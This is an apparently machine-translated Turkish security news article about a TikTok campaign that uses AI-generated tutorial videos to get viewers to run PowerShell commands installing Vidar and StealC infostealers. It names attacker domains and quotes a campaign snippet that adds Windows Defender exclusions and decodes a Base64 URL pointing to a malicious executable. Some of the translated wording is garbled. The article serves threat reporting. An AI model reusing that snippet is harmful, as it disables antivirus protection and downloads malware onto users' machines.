Siber suçlular, platformda yüz binlerce kullanıcıya ulaşmış olan tehlikeli bilgi çalma kötü amaçlı yazılımlarını dağıtmak için AI tarafından oluşturulan öğretici videolar kullanarak Tiktok’ta sofistike sosyal mühendislik saldırıları oluşturmak için yapay zeka silahlandırdı.
Tehdit aktörleri, meşru yazılım öğreticileri olarak maskelenen, özellikle korsan uygulamaların kilidini açmak isteyen kullanıcıları hedefleyen yapay zeka tarafından üretilen videolar oluşturarak Tiktok’un büyük kullanıcı tabanını kullanıyor.
Bu aldatıcı videolar, şüphesiz izleyicileri standart bir yazılım etkinleştirme süreci gibi görünen şeyle yönlendirir, bunun yerine, VIDAR ve STEALC dahil olmak üzere tehlikeli kötü amaçlı yazılım varyantlarını cihazlarına sessizce yükleyen kötü niyetli PowerShell komutları yürütmelerini kandırır.
.png
)
Bu kampanyanın kapsamı özellikle endişe vericidir, güvenlik araştırmacıları bu kötü niyetli videoların bazılarının yaklaşık yarım milyon görüntüleme biriktirdiğini ve Tiktok’un küresel kullanıcı topluluğunda yaygın bir uzlaşma potansiyelini düşündürmektedir.
Saldırı, AI tarafından oluşturulan içeriğin ikna edici gücünü popüler sosyal medya platformlarının güvenilir ortamıyla birleştirerek sosyal mühendislik taktiklerinde önemli bir evrimi temsil ediyor.
E -posta eklerine veya şüpheli indirmelere dayanan geleneksel kötü amaçlı yazılım dağıtım yöntemlerinin aksine, bu kampanya, kullanıcıların video eğitimlerine verdiği doğal güvenden yararlanarak ortalama kullanıcıların tehdidi tanımlamasını son derece zorlaştırır.
Censys analistleri, kampanyanın altyapısının, algılamadan kaçınmak ve kalıcılıktan kaçınmak için özel olarak tasarlanmış birden fazla alan ve IP adresi kullanan sofistike bir operasyon ortaya koyduğunu belirtti.
Censys araştırmacıları tarafından yapılan daha fazla araştırma, AMSSH.CO, Allaivo.me ve Winbox.ws gibi alanlar da dahil olmak üzere, AS214196 olarak bilinen ve “KYC gereksinimleri olmayan hızlı, güvenli ve anonim sanal serpenler” adlı bir kurşun geçirmez barındırma sağlayıcısında barındırılan kapsamlı bir kötü niyetli altyapı ağı tespit etti.
.webp)
Bu barındırma düzenlemesi, siber suçluların minimum gözetim ile çalışmasını sağlar ve yayından kaldırma çabalarını önemli ölçüde daha zorlaştırır.
Powershell bazlı enfeksiyon mekanizması
Kötü amaçlı yazılım enfeksiyon süreci, birden fazla kaçırma ve kalıcılık tekniklerini uygulayan sofistike PowerShell komut dosyalarına dayanmaktadır.
Mağdurlar sağlanan komutları yürüttüğünde, kötü amaçlı yazılım Windows savunucusunu atlamak ve uzun vadeli sistem erişimi oluşturmak için tasarlanmış çok aşamalı bir yük dağıtım sistemi başlatır.
.webp)
Çekirdek enfeksiyon komut dosyası, kötü amaçlı URL’leri gizlemek için Base64 kodlama ve güvenilir yük indirme için yeniden deneme mekanizmaları uygulayarak gelişmiş gizleme tekniklerini gösterir.
Kampanyadan temsili bir kod parçacığı, kötü amaçlı yazılımın metodik yaklaşımını ortaya koyuyor:-
function Add-Exclusion { param([string]$Path) try { Add-MpPreference -ExclusionPath $Path -ErrorAction SilentlyContinue } catch {} }
$downloadUrl = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("YWxsYWl2by5tZS9jcnlwdGVkLmV4ZQ=="))Bu komut dosyası, kod çözülmüş URL’lerden ana yükü indirmeden önce belirli dizinler için Windows Defender izlemesini devre dışı bırakır.
Kötü amaçlı yazılım, sistem klasörlerinde gizli dizinler oluşturarak ve kendisini güvenilir bir Windows güncelleme hizmeti olarak yükleyerek kalıcılık oluşturur ve güvenlik yazılımı tarafından algılanmaktan kaçınmak için sistem yeniden başlatıldıktan sonra bile sürekli çalışmayı sağlar.
9 yılını kutlayın. Run! Tam gücünün kilidini açmak TI Arama Planı (100/300/600/1.000+ arama istekleri) ve istek kotanız iki katına çıkacaktır.